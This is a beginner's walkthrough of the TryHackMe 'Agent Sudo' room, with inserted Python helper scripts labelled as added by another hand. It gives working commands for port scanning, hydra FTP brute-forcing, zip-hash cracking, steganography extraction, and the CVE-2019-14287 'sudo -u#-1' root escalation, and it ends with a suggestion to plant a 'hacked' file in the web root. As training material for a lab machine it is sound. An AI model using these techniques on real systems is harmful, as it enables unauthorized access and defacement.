Well, well, well… here we are, and I’m so excited to finally put something down here. At first I was too lazy to write an article on Medium; then I realized how much it matters to the community, since I’ve also benefited greatly from reading other people’s content.
In this article I’ll walk you through the process I took to solve this challenge and gain root access to the machine. I’ll try to make it as simple as possible for us newbies. It’s rated easy, by the way, but not as easy as they say.
I’ll break it down just as I went through it, ups and downs included. That being said, do me the honors.
Challenge name: Agent Sudo
Platform: Tryhackme
Category: Easy
Task 1
The first task is deploying the machine. Once it’s up, you can connect to it using the AttackBox or via OpenVPN.
To talk to the machine you need to be on the same network. OpenVPN did that for me, since the AttackBox has a time limit for users without a subscription.
Task 2
Since the machine is now reachable, the next step is to enumerate the open ports and the services running on the target. For that I used nmap (a very useful penetration-testing tool). The -A flag turns on version detection, OS detection, default script scanning and traceroute; it is noisy, but that’s fine on a CTF box.
The command I used:
nmap -A ipaddress
As can be seen in the screenshot below, there were three open ports: 21, 22 and 80, i.e. FTP, SSH and HTTP.
Port 80 being open means there’s a web server we can open in a browser. You can see the result of pasting the IP into a browser below.
The site says it’s hidden and can be accessed with a code name. I looked at the hint: the server checks the User-Agent header, so I had to change my user agent from the normal Firefox string to the single letter C. In Firefox I installed a user-agent switcher extension, set the agent to C, and that got me to this page.
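The same User-Agent trick can be done from the command line instead of a browser extension. Here is an added Python example (my own code, not the author’s or TryHackMe’s): it fetches the page once with a normal browser agent, then once with each candidate code name, and reports which agents get a different response. The target URL, the candidate list (single capital letters) and the baseline agent string are assumptions.

```python
"""Find User-Agent values that make a site respond differently.

Added example, not the writeup's own code. The URL default, the candidate
agents (A-Z) and the baseline agent string are assumptions.
"""
import hashlib
import string
import sys
import urllib.error
import urllib.request
from typing import Callable, Dict, Iterable


def fetch_with_agent(url: str, agent: str, timeout: float = 5.0) -> bytes:
    """GET url with the given User-Agent and return the body bytes.

    Error responses (403, 404, ...) are returned as bodies too: a status
    change is exactly the kind of difference we are looking for.
    Redirects are followed, so a redirect to a hidden page shows up as
    that page's content.
    """
    req = urllib.request.Request(url, headers={"User-Agent": agent})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.read()
    except urllib.error.HTTPError as err:
        return err.read()


def find_special_agents(fetch: Callable[[str], bytes],
                        agents: Iterable[str],
                        baseline_agent: str = "Mozilla/5.0 (X11; Linux x86_64)"
                        ) -> Dict[str, str]:
    """Return {agent: sha256(body)} for every agent whose response body
    differs from the one served to baseline_agent.

    fetch is injected so the comparison logic can run offline against a
    fake server as well as against a live target.
    """
    baseline = hashlib.sha256(fetch(baseline_agent)).hexdigest()
    hits: Dict[str, str] = {}
    for agent in agents:
        digest = hashlib.sha256(fetch(agent)).hexdigest()
        if digest != baseline:
            hits[agent] = digest
    return hits


if __name__ == "__main__":
    # Usage: python ua_probe.py http://10.10.10.10/   (assumed target IP)
    target = sys.argv[1] if len(sys.argv) > 1 else "http://10.10.10.10/"
    special = find_special_agents(lambda a: fetch_with_agent(target, a),
                                  string.ascii_uppercase)
    for agent, digest in special.items():
        print(f"User-Agent: {agent} -> different page (sha256 {digest[:16]}...)")
```

Comparing a hash of the body against a baseline, rather than looking for a specific string, means you do not need to know in advance what the hidden page looks like; any agent that changes the response (different content, a redirect, a 403) gets flagged.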
That page gave me one user name: chris. I also did some directory discovery with ffuf but couldn’t find any hidden directories.
So I moved on to the next service, FTP (File Transfer Protocol). If you don’t know what that means, I’m not telling you either. Ask Google. 😄
Anonymous FTP login is not allowed (I tried it and it didn’t work). But since we have a user name, we can try brute-forcing the login. For FTP brute-forcing I used hydra:
hydra -l chris -P password_list.txt IP ftp
I used -l (lowercase) because I already had a single user name; with a list of user names I would have used -L. Likewise -P takes a file of passwords, while -p would take a single password.
As you can see in the picture, I fed hydra a list of 7-character passwords only, because I guessed the password would have 7 characters. I did this with a simple Python script that reads a wordlist and prints only the entries of a given length.
That way hydra has far fewer guesses to make and finishes much faster.
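For reference, here is an added Python example of such a filter (my own script, not the author’s). It works on bytes rather than decoded text, because rockyou.txt contains lines that are not valid UTF-8 and because hydra sends the raw bytes anyway, so the byte length is the length that matters. The file names are assumptions.

```python
"""Trim a wordlist to candidates of a given length before running hydra.

Added example, not the author's script. Path names are assumptions.
"""
import argparse
import sys
from typing import Iterable, List


def filter_by_length(words: Iterable[bytes], min_len: int, max_len: int) -> List[bytes]:
    """Keep entries whose byte length is within [min_len, max_len].

    Only the line terminator is stripped, so a password with leading or
    trailing spaces keeps its real length. Duplicates are dropped (hydra
    would otherwise try them twice) while the original order is preserved.
    """
    seen = set()
    kept: List[bytes] = []
    for raw in words:
        word = raw.rstrip(b"\r\n")
        if not (min_len <= len(word) <= max_len) or word in seen:
            continue
        seen.add(word)
        kept.append(word)
    return kept


def main(argv: List[str] = None) -> int:
    parser = argparse.ArgumentParser(
        description="Keep only wordlist entries of a given length")
    parser.add_argument("wordlist",
                        help="input list, e.g. /usr/share/wordlists/rockyou.txt")
    parser.add_argument("-n", "--length", type=int, required=True,
                        help="exact length to keep")
    parser.add_argument("-o", "--output", default="-",
                        help="output file (default: stdout)")
    args = parser.parse_args(argv)

    # Binary mode: rockyou.txt has non-UTF-8 lines that would otherwise crash
    # a text-mode read or be silently dropped.
    with open(args.wordlist, "rb") as fh:
        kept = filter_by_length(fh, args.length, args.length)

    data = b"\n".join(kept) + (b"\n" if kept else b"")
    if args.output == "-":
        sys.stdout.buffer.write(data)
    else:
        with open(args.output, "wb") as out:
            out.write(data)
    return 0


if __name__ == "__main__":
    sys.exit(main())
```

Usage (assumed file names): python pwlen.py /usr/share/wordlists/rockyou.txt -n 7 -o seven.txt, then hydra -l chris -P seven.txt IP ftp.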
Okay, we’ve found the password: crystal. A weak one, but that’s common. Next, I logged into FTP with:
ftp IP_addr
After entering the user name and password we’re logged in. There are some files present: two pictures and a text file, To_agent_J. I used the get command on the FTP server to download them.
We get a message from agent C to agent J, and from the message agent C seems to be pointing at one of the pictures.
So we go back and check the picture for hidden content. For this I used binwalk, which scans a file for embedded file signatures and, with -e, extracts whatever it finds:
binwalk -e cutie.png
You can see a hidden zip file in there, along with some other blah blah blah that I didn’t care about. I extracted it with the command above, only to discover it was a password-protected zip file (8702.zip). Luckily, John the Ripper is there to do the heavy lifting.
First use zip2john to turn the archive into a crackable hash, then john to crack it:
zip2john 8702.zip > ziphash
john ziphash
I’m getting tired of screenshotting…. just so many picturesssssssss and I’m hungry!
So we get a password: “alien”. But how does that help my life? I remember trying unzip and tar to open the archive, but they didn’t work. I didn’t know why at the time, so I googled the error message, and from the results 7z turned out to be the right tool for it:
7z x 8702.zip
I was prompted for the password and successfully extracted a message, To_agentR.txt. It contained some seemingly encoded text, and though I’m not good at cryptography, I tried an online base64 decoder and got another password out of it.
Note: I’ll appreciate any form of assistance with cryptography. Thank you, thank you.
At first I didn’t know what to do with that password. I tried binwalk on the other picture from the FTP server but got nothing, and stegsnow gave nothing either. Later I discovered steghide, which extracts data that was embedded with a passphrase in JPEG, BMP, WAV or AU files (which is why the .jpg, not the .png, is the target here), and stegcracker, which wraps steghide and tries passphrases from a wordlist.
Normally I would have used steghide directly, since it takes the image and the passphrase and I already had the passphrase, but stegcracker seemed way easier to use, so why not? Maybe you should go check out steghide yourself.
Then we get another message, this time from chris to james (another user), and it contains the password “hackerrules!”.
The obvious next step is to use these credentials to log in via SSH, and it works. Once logged in as james, you find the user.txt flag and an image:
ssh username@IP
then, to pull the image back to your own machine:
scp james@IPaddr:/home/james/Alien_autospy.jpg Path_you_want_to_download_to
A Google reverse image search, plus a Fox News article, identified the photo as the “Roswell alien autopsy” incident.
Now we’re left with escalating our privileges to root. Running sudo -l shows that james may run /bin/bash as any user except root: “(ALL, !root) /bin/bash”.
A Google search for that sudoers pattern leads to CVE-2019-14287, a bug in sudo versions before 1.8.28. With a “!root” Runas spec, sudo accepts a user ID given as -u#-1 (or -u#4294967295): -1 is not uid 0, so the “not root” check passes, but setresuid(-1) means “leave the uid unchanged”, and sudo itself is already running as root.
So running sudo -u#-1 /bin/bash gives me a root shell. Next, navigate to /root. And voilà, you find the root.txt file. Open it to find the name of that troublesome agent and the flag. I’m not pasting the flag here, lol. Just use Google Lens to do that.
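Before firing the exploit on a box you care about, it is worth confirming both preconditions: a sudo version older than 1.8.28 and a Runas spec of exactly the “(ALL, !root)” shape. Here is an added Python example (my own, not from the writeup) that parses the output of sudo -V and sudo -l for those two things; the regular expression matches the shape shown above, with optional tags like NOPASSWD:, and is not a full sudoers parser. Sample strings used for testing are constructed.

```python
"""Pre-checks for the sudo -u#-1 trick (CVE-2019-14287).

Added example, not from the writeup. It parses 'sudo -V' and 'sudo -l'
output. The sample strings used in testing are constructed.
"""
import re
import subprocess
from typing import List, Optional, Tuple

# First sudo release that fixed CVE-2019-14287.
FIXED_VERSION = (1, 8, 28)

_VERSION_RE = re.compile(r"Sudo version (\d+)\.(\d+)\.(\d+)(?:p(\d+))?")
# Matches "(ALL, !root) /bin/bash", optionally with tags such as NOPASSWD:.
# Deliberately narrow: this is the shape the bug needs, not a sudoers parser.
_RUNAS_RE = re.compile(r"\(\s*ALL\s*,\s*!root\s*\)\s+(?:[A-Z_]+:\s*)*(\S+)")


def parse_sudo_version(banner: str) -> Optional[Tuple[int, int, int, int]]:
    """'Sudo version 1.8.21p2' -> (1, 8, 21, 2); patch level defaults to 0."""
    m = _VERSION_RE.search(banner)
    if not m:
        return None
    major, minor, release, patch = m.groups()
    return (int(major), int(minor), int(release), int(patch or 0))


def vulnerable_to_cve_2019_14287(banner: str) -> bool:
    """True when the version is older than 1.8.28 (any patch level)."""
    version = parse_sudo_version(banner)
    return version is not None and version[:3] < FIXED_VERSION


def exploitable_commands(sudo_l_output: str) -> List[str]:
    """Commands allowed with a '(ALL, !root)' Runas spec.

    The bug needs exactly this shape: every user is allowed except root.
    sudo -u#-1 then passes the '!root' check (uid -1 is not uid 0) while
    setresuid(-1) leaves the already-root sudo process running as root.
    """
    return _RUNAS_RE.findall(sudo_l_output)


def main() -> None:
    banner = subprocess.run(["sudo", "-V"], capture_output=True, text=True).stdout
    listing = subprocess.run(["sudo", "-l"], capture_output=True, text=True).stdout
    print("sudo version:", parse_sudo_version(banner))
    print("older than 1.8.28:", vulnerable_to_cve_2019_14287(banner))
    for cmd in exploitable_commands(listing):
        print(f"candidate: sudo -u#-1 {cmd}")


if __name__ == "__main__":
    main()
```

If the version check says the fix is present but the Runas spec still matches, the -u#-1 trick will be rejected; patched sudo refuses user IDs that do not map to a real account.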
One more thing: go to /var/www/html/ and create a file called hacked, or anything of your choice, and write whatever you want in it. You’ve successfully rooted the machine. Gracias!
This was a long one, and I was tired. Hopefully you didn’t reach the end of the article. If you did, kudos! If you found the article interesting, don’t follow. Yes, don’t follow me. I still appreciate your comments, though.